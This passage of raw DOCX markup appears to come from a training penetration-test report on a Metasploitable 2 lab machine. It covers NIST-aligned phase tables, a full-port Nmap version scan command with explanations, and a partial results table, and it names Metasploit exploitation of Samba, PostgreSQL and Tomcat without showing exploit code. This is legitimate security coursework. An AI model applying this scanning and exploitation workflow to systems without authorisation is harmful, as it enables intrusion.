        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 Activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3626"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Application in This Engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Network Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Identify active hosts on the network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3626"/>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Nmap host discovery confirmed 10.0.2.9 is active</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Port &amp; Service Identification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Enumerate open ports and services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3626"/>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Nmap -sV scan on all 65,535 TCP ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Vulnerability Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Identify known weaknesses in services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3626"/>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Manual CVE mapping; service version analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Security Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Validate vulnerabilities through controlled testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3626"/>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Metasploit exploitation: Samba, PostgreSQL, Tomcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Post-Testing Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Assess impact and document results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3626"/>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Session analysis; impact assessment; report writing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4  Assessment Phase Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment was conducted in five sequential phases. Each phase built upon the intelligence gathered in the previous step, reflecting the iterative nature of professional penetration testing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 6: Assessment Phase Overview</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4026"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Nmap 7.95</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4026"/>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Map the target attack surface; identify live services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Nmap -sV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4026"/>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Enumerate service versions; identify legacy software</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Vulnerability Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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CVE/NVD Lookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4026"/>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Map services to known CVEs; assign CVSS scores</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4026"/>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Validate exploitability; demonstrate real-world impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4026"/>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Communicate findings, risks, and remediation steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="420" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">3.  Reconnaissance and Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1  Passive Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">As this assessment targeted a laboratory virtual machine (Metasploitable 2) within an isolated internal network, the scope for passive reconnaissance was limited. The following observations were made prior to active scanning:</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The target IP address (10.0.2.9) was confirmed as a private, non-routable address within the RFC 1918 10.0.0.0/8 address range</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The target resides on an isolated host-only or NAT-configured lab network, with no external internet exposure</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The designation of 10.0.2.9 as a Metasploitable 2 lab VM was established as part of the pre-engagement scope definition</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No OSINT (Open-Source Intelligence) activities were required or applicable in this lab context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2  Active Reconnaissance — Nmap Service and Version Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Active reconnaissance was performed using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap 7.95</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the service and version detection flag (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). This scan probes open ports to determine the specific software and version running on each service, enabling targeted vulnerability analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following scan configuration was applied:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Full-port TCP scan with service/version detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -p- 10.0.2.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Scan parameters:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#   -sV   : Service and version detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#   -p-   : Scan all 65,535 TCP ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Target: 10.0.2.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The -sV flag interrogates each open port to identify the service name and software version. This is a standard reconnaissance technique within the PTES Intelligence Gathering phase and NIST SP 800-115 Port and Service Identification activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3  Nmap Scan Assessment Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The scan produced the following high-level assessment overview, as confirmed by the Nmap output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 7: Nmap Scan Assessment Overview</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6226"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Target IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6226"/>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10.0.2.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Tool Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6226"/>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Nmap 7.95</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Scan Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6226"/>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Service and Version Detection (-sV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Target Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6226"/>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Host is UP — Responding to probes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Total TCP Ports Scanned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6226"/>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65,535</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Closed TCP Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6226"/>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65,505 reported as closed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Open TCP Ports Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6226"/>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23+ (including high-numbered ephemeral RPC ports)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Assessment Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6226"/>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Reconnaissance / Service Enumeration</w:t>
            </w:r>
          </w:p>
